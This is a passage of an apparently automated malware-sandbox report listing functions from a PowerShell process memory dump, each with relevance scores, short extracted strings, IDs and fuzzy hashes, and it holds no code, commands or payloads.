                          • String ID: (f$l$(f$l$(f$l$(f$l$(f$l$(f$l$(f$l$(f$l
                          • API String ID: 0-272791228
                          • Opcode ID: 44d37d380e3620f6f6d2f0d24ed52d9ce28463f8b2a6cd17db6d3d067d836e5d
                          • Instruction ID: 36debcfff838ff03de1d3c511160615a8bf6e8d80987d3415ac13e36421cdd76
                          • Opcode Fuzzy Hash: 44d37d380e3620f6f6d2f0d24ed52d9ce28463f8b2a6cd17db6d3d067d836e5d
                          • Instruction Fuzzy Hash: 87C1C3B1A2021AEFCB24CF58C551A6AB7B2BF85714F14C52DC8066BB44DB32EC43DB91
                          Function 07228391 Relevance: 10.2, Strings: 8, Instructions: 169COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                          • API String ID: 0-3865595929
                          • Opcode ID: 7ea104f2ecb282d67e19adb21ee06d8a39a72ab8d6fe395009077234c9055741
                          • Instruction ID: 477d01d9ad9cb7fbbef1f71e930fd164904d6cd372f1802c3f080ade46c2c75c
                          • Opcode Fuzzy Hash: 7ea104f2ecb282d67e19adb21ee06d8a39a72ab8d6fe395009077234c9055741
                          • Instruction Fuzzy Hash: 29515DB1B6422AFFCB288F64C44066ABBA2BF85310F14C46AE4119F395CF71C857DB91
                          Function 0722DABD Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$84"l$tP^q$$^q$$^q$$^q
                          • API String ID: 0-1957454304
                          • Opcode ID: f2f5e5a184f85802cc1751ac3905ef702a7098569573ed252e5b8882fe1874e8
                          • Instruction ID: e0b93471f039a208c6ce4c5c9df1f999066dced33e00198de383ddd784de9825
                          • Opcode Fuzzy Hash: f2f5e5a184f85802cc1751ac3905ef702a7098569573ed252e5b8882fe1874e8
                          • Instruction Fuzzy Hash: DC61A2F173022BFFDB288E14C5447BAB7A2BF45711F588455E8015B2A4C7B1DD82EBA1
                          Function 07221D90 Relevance: 7.6, Strings: 6, Instructions: 138COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$t~qq$$^q$$^q$$^q
                          • API String ID: 0-2923853403
                          • Opcode ID: c3beb816826b83ad2303c25cac48b9865b7b54215220337767e117705e4ef889
                          • Instruction ID: 6b6d91e16c73c49995069bea6a53acca5b4efa45e196c1bfd29049b45c7d3e78
                          • Opcode Fuzzy Hash: c3beb816826b83ad2303c25cac48b9865b7b54215220337767e117705e4ef889
                          • Instruction Fuzzy Hash: 104180B1B202AFFBC7291E698800A76F7D6AFC5210F24487AD4418F255DF31C867D351
                          Function 07228620 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                          • API String ID: 0-2392861976
                          • Opcode ID: db80fc6904fd93649c0e8d0c7c5046661aec8ce64750409f958d7a655eb96731
                          • Instruction ID: 793c05af41d5f9d61787002b4857f48c7d8189a493d2b594d08e566c5bf003fb
                          • Opcode Fuzzy Hash: db80fc6904fd93649c0e8d0c7c5046661aec8ce64750409f958d7a655eb96731
                          • Instruction Fuzzy Hash: C131BBB6B34367AFDB391D658404176F7E1ABC2201B18447FC4018F205CE75C44BE752
                          Function 0722CCB6 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$84"l$d%dq$d%dq$d%dq$tP^q
                          • API String ID: 0-2526330134
                          • Opcode ID: edf4989deb160c03ff6d03f3e2be87d97c00fb99fdf3970d98a93d538b8a7c95
                          • Instruction ID: 962e9e4ba10ebe39369dcb364b14f862a2a2639e225eb8581564257f15166ebe
                          • Opcode Fuzzy Hash: edf4989deb160c03ff6d03f3e2be87d97c00fb99fdf3970d98a93d538b8a7c95
                          • Instruction Fuzzy Hash: 8231A7B1B20129EFC718DF54C444A5DFBA2BB88710F248555E905AB351C771DD82DBA1
                          Function 0722263D Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                          • API String ID: 0-3669853574
                          • Opcode ID: f9659776f9ad638a0b7d6537dc57e5edba716b8963a4892db283ec1e4ee92bcf
                          • Instruction ID: dd0af1b51d3c6ea1824b18e9c7b4ce011727994be2071ec3ba98bcae1fc6a2cd
                          • Opcode Fuzzy Hash: f9659776f9ad638a0b7d6537dc57e5edba716b8963a4892db283ec1e4ee92bcf
                          • Instruction Fuzzy Hash: 621159B2B2022BEFCB388E59941467637E57F8161072B405ED8409F326CE22CC46DB99
                          Function 0722D83D Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 84"l$84"l$tP^q$tP^q$$^q
                          • API String ID: 0-618687464
                          • Opcode ID: f48cd9c11f6cd163879edff619ac63f100578dc52b7b84785918d5b783a94ed3
                          • Instruction ID: 518a301b5f2eef7ed2483112645566debbf89ba9572b7015058d79a47e4db772
                          • Opcode Fuzzy Hash: f48cd9c11f6cd163879edff619ac63f100578dc52b7b84785918d5b783a94ed3
                          • Instruction Fuzzy Hash: 4E6106B1B2021AEFC7149F68C400A6AFBE2AF89710F24C469E8559F391CB71DD47DB91
                          Function 07222F00 Relevance: 6.4, Strings: 5, Instructions: 127COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$$^q$$^q$$^q
                          • API String ID: 0-3272787073
                          • Opcode ID: 615dbd7f6c87275adaec5657f457bbabaac9db7c88ed7cef9e6988227cf351cf
                          • Instruction ID: 158cb28ae4303c4aa1577b1e12c42ebbebc5bf0b93e751d5aef1f6a305658097
                          • Opcode Fuzzy Hash: 615dbd7f6c87275adaec5657f457bbabaac9db7c88ed7cef9e6988227cf351cf
                          • Instruction Fuzzy Hash: B8415CB2B3022BEFDB298E2584441B6B7E1FF82610F25846AD811CF251DB76C947E761
                          Function 0722CEFC Relevance: 6.4, Strings: 5, Instructions: 125COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$$^q$$^q$$^q
                          • API String ID: 0-3272787073
                          • Opcode ID: 64351bf7c635e2bd74e6d5aff0f69978ee3611ed18dc9c67c63f62895b4fc9c0
                          • Instruction ID: 799a71b48fe2dba70dd686d97e692f77d3ae718ee10f59985a7c08a56cf04742
                          • Opcode Fuzzy Hash: 64351bf7c635e2bd74e6d5aff0f69978ee3611ed18dc9c67c63f62895b4fc9c0
                          • Instruction Fuzzy Hash: 0B4158F2724367AFCB284E2994206BABBE5AB85210B24446BD8158B255CA36C4C7E371
                          Function 0722DE88 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 84"l$XRcq$XRcq$tP^q$$^q
                          • API String ID: 0-2948316225
                          • Opcode ID: 1eeb0e56fb97c1922ab71a70f3316db4a2676df6955d4b93c4873ef011b3e64f
                          • Instruction ID: cf8fc6a43bae3c0cf82734593158a46a784db36c660a4b538f3d69ba193afc52
                          • Opcode Fuzzy Hash: 1eeb0e56fb97c1922ab71a70f3316db4a2676df6955d4b93c4873ef011b3e64f
                          • Instruction Fuzzy Hash: 734181B0B2012AEBDB24CE19C144A69B7F2BF85310F55C4A9E8046F294C771DD43EB51
                          Function 07224215 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$$^q$$^q$$^q
                          • API String ID: 0-3272787073
                          • Opcode ID: 762a09ef482281b77327ff2e8cdc8e86bf1502af6a490eb7f8f2561e13b9616b
                          • Instruction ID: 5c86c3197da467eacbd82170e8090fe537cba9f3f41986aa2ae2ff374f2ebe96
                          • Opcode Fuzzy Hash: 762a09ef482281b77327ff2e8cdc8e86bf1502af6a490eb7f8f2561e13b9616b
                          • Instruction Fuzzy Hash: 163168B1B342A7EFDB296E6684045B6B7E1EBC2211B24857EC8058F204DE31CC57E751
                          Function 0722E130 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l$(f$l$4'^q$4'^q
                          • API String ID: 0-3427128107
                          • Opcode ID: 5996087bf97c19715a0341fbf3e6c90aebcdfb239c7ff078e632edacc558df79
                          • Instruction ID: 7f5e47c8f11a16d9fa06f1d5637fbba600e23203232a624f7b9da981bec6ef4b
                          • Opcode Fuzzy Hash: 5996087bf97c19715a0341fbf3e6c90aebcdfb239c7ff078e632edacc558df79
                          • Instruction Fuzzy Hash: E3C1B2B0E20219EFCB24DF64C545BAEBBB2BF84700F158529D8016B754DB71EC46EB91
                          Function 07224BC8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 84"l$84"l$tP^q$tP^q
                          • API String ID: 0-3141385730
                          • Opcode ID: 45a7c055787bb30787fa7b5c28b3275c81b55f8eab642ede926e328952a1815e
                          • Instruction ID: 9120718ad31a905455ce30d9f05798250d131f97e1304500378d081feb0bd9cc
                          • Opcode Fuzzy Hash: 45a7c055787bb30787fa7b5c28b3275c81b55f8eab642ede926e328952a1815e
                          • Instruction Fuzzy Hash: B4916CB1B142A6BFCB18AF79C84067ABBE6AF85710F14846AD805DF390CA71CC46D761
                          Function 0722626F Relevance: 5.3, Strings: 4, Instructions: 251COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l$(f$l$(f$l$(f$l
                          • API String ID: 0-1234685032
                          • Opcode ID: 86e46737376dd832e82182ab53ab00a2e4f6d47262ea4fb5c67b56024889dd33
                          • Instruction ID: 5db8a0c35e2a9f1cef0d90a64f30680c8ab4867ade6cd1393643a74ba722128b
                          • Opcode Fuzzy Hash: 86e46737376dd832e82182ab53ab00a2e4f6d47262ea4fb5c67b56024889dd33
                          • Instruction Fuzzy Hash: 5CA1A1B2A20626EBCB24CF54C581AAAF7B2BF84714F14C52DD8066BB44D732E843DB50
                          Function 07227CD8 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l$(f$l$(f$l$(f$l
                          • API String ID: 0-1234685032
                          • Opcode ID: b5b532b2856151d054cea1dec2c0241a42ba34d9c941b08d56168d6e4d590036
                          • Instruction ID: 07c013a0ec5424d936dc232d8335bffba0b501511f7d86a665162113e2d84b88
                          • Opcode Fuzzy Hash: b5b532b2856151d054cea1dec2c0241a42ba34d9c941b08d56168d6e4d590036
                          • Instruction Fuzzy Hash: 4D7194B0A2421AEFCB14CF58C451AAEFBB2BF88310F14C169D9056B755CB71DC42DBA1
                          Function 07221BD0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $^q$$^q$$^q$$^q
                          • API String ID: 0-2125118731
                          • Opcode ID: e938baea16f11b744ad9f67039f5fb6bae26983806fbc3553e4d4dd725501388
                          • Instruction ID: 15c8af347ff7f90739256ea71b2d5ee34f97766e13073d0dcab7e20ba0d69383
                          • Opcode Fuzzy Hash: e938baea16f11b744ad9f67039f5fb6bae26983806fbc3553e4d4dd725501388
                          • Instruction Fuzzy Hash: 362177B573022F7BDB38492A8800F37B6DA9BC0710F24843BA505CF3A5DD76C8529362